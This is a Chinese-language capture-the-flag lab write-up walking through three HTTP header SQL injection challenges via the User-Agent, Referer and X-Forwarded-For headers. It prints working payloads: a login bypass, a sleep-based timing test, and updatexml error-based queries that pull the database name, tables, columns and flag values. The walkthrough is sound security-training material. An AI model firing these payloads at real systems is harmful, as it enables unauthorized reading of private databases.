Head注入(USERANGENT、Referer、X-forword-for)
Head注入
靶场地址
原理:
head注入就是通过burp抓包,修改它的请求头useagent的数据来和数据库进行交互查询数据
第一题:
我们先查看url栏,没有get传参
再尝试post传参
在usename栏输入代码
' or 1=1 #
发现usename不行查看源代码,可以通过password传参
接着我们尝试头注入,查看源代码,发*现它使用了超全局变量$uagent = $_SERVER[‘HTTP_USER_AGENT’];并且它有个if语句必须要登陆才可以插入usergent语句,我们已经通过password找到了账号密码,并且登陆成功,所以直接用admin 和123456
利用谷歌插件,进行请求头修改
'or sleep(5),1)#
发现网页有明显的延迟,判断正确。
于是我们利用updatemlx()进行报错获取数据库名
'or updatexml(1,concat(0x7e,(select database())),1),1)#
获得数据库名:head_error
再继续查表名,输入代码
'or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where TABLE_SCHEMA='head_error')),1),1)#
查出表名
flag_head
ip
refer
uagent
user
再查字段,把下面代码输入到谷歌插件中
'or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where TABLE_NAME='flag_head')),1),1) #
得出所有字段名:
id
flag_h1
于是直接用最后输入sql语句代码
'or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1) #
所有flag为
zKaQ-YourHd,zKaQ-Refer,zKaQ-ip
验证为第一个
第一题完
第二题:
和第一题类似
首先找到登陆账号密码
我们利用updatemlx()进行报错获取数据库名
'or updatexml(1,concat(0x7e,(select database())),1),1)#
然后直接用burp抓包修改refer,输入代码
'or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where TABLE_SCHEMA='head_error')),1),1)#
查询数据为
得到所有表名
接着查列名
'or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where TABLE_NAME='flag_head')),1),1) #
得到列名中有flag
直接继续查数据
'or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1) #
得到所有flag
第二题和第一题区别就是一个修改useragent 一个修改refer
第二题完
第三题:
查看源代码
它这里替换的是ip
所以我们直接修改ip进行传参即可,我们用谷歌插件,X-Forwarded-For进行传参
输入代码
'or updatexml(1,concat(0x7e,(select database())),1),1) #
得到数据库名
我们继续查表名:
输入代码
'or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where TABLE_SCHEMA='head_error')),1),1)#
得到所有表名
接着查列名
'or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where TABLE_NAME='flag_head')),1),1) #
得到列名中有flag
直接继续查数据
'or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1) #
但是最后一个flag并不是zKaQ-ipi,可能是长度不够,重新输入代码
'or updatexml(1,concat(0x7e,(select flag_h1 from flag_head limit 2,1)),1),1) #
验证即,正确
第三题完
Head注入(USERANGENT、Referer、X-forword-for)相关推荐
- php iframe referer,【技术分享】通过iframe注入实现referer欺骗
稿费:100RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 前言 去年我们提过一种很简单的在Edge上实现referer欺骗的技术,该技术允许我们实现referer欺骗甚 ...
- SOL注入——HTTP头部注入(2)(七)
本章目的 普及HTTP头部字段User-Agent.Referer.Cookie.X-Forwarded-For等的含义和作用,掌握HTTP头部注入的原理.方法及基本流程. HTTPHeader概述 ...
- SOL注入——HTTP头部注入(六)
本章目的 普及HTTP头部字段User-Agent.Referer.Cookie.X-Forwarded-For等的含义和作用,掌握HTTP头部注入的原理.方法及基本流程. HTTPHeader概述 ...
- 小白学习的sql注入
小白学习的sql注入 一.sql注入漏洞原理 二.漏洞危害 三.sql注入分类 四.sql-labs靶场搭建 五.注入 六.注入流程 七.注入防范措施 八.辅助插件hackbar的安装 一.sql注入 ...
- 在sqli-liabs学习SQL注入之旅(第十一关~第二十关)
十一关 可以看到十一关和之前的十关是截然不同,偶尔也得换换口味才有新鲜感嘛!话不多说,开搞! 前言:这里有两个提交框,我们应该从哪里注入呢?这并不是困扰我们的问题.我们在实战中应该多方面测试,两个框都 ...
- 探针一号的SQL注入学习笔记
SQL注入学习笔记 文章目录 SQL注入学习笔记 1.问题 2.sqlilabs环境配置 3.第一个注入过程详解(整型注入) 4.跨库注入 5.字符型注入 5.报错注入 6.POST和COOKIE请求 ...
- 在sqli-liabs学习SQL注入之旅(第二十一关~第三十关)
二十一关 打开这一关,开屏暴击.报错的大致意思是时区没有设置好,我们进入报错的文件,在php代码中加入中国时区的代码即可: date_default_timezone_set("PRC&qu ...
- SQL注入--HTTP头部注入
实验目的 理解HTTP头部字段User-Agent.Referer.Cookie.X-Forwarded-For等的含义 和作用,掌握HTTP头部注入的原理.方法及基本流程. 实验原理 有时候,后台开 ...
- web渗透之sql注入
博主姓名:摆烂阳 博主主页面链接:传送门 新人入圈,希望博主的内容可以给大家带来帮助,有任何问题可以私信本人 摆烂阳从不摆烂滴 目录 一.前言 二.实验准备 三.sql注入检测方法 1.数字型检测 2 ...
最新文章
- 多个Activity与Fragment之间的数据传递
- Springboot/Cloud集成Sentinel进阶实战
- 深度学习《patchGAN》
- Gentle.NET 使用文档
- 4 相机切换_景明促销IIVlog小新机 索尼Vlog相机ZV1
- centos普通用户修改文件权限_Linux CentOS更改文件的权限与用户及用户组管理命令...
- HTTP 之 HTTPD介绍
- TCP/IP协议 1 ----实验楼转
- 音乐治疗在计算机的应用,音乐治疗中虚拟现实(VR)技术的应用
- MacOS代理设置(桌面应用代理设置Terminal代理设置)
- java http请求发送unicode_Java发送http请求
- XCTF-PWN pwn-200(使用DynELF利用write泄露system地址)
- 基于PHP+Mysql全品类在线购物商城设计
- linux更新网卡驱动
- 控制工程中的数学建模(9)——音圈电机的原理及数学模型
- ue4 玩家控制器APlayerController
- android gettext方法,android – EditText不返回getText()上的内容
- linux下运行directx,使用DXVK在Linux上改善您的葡萄酒游戏
- 用 Python 分析香港楼市
- Windows系列原版系统镜像下载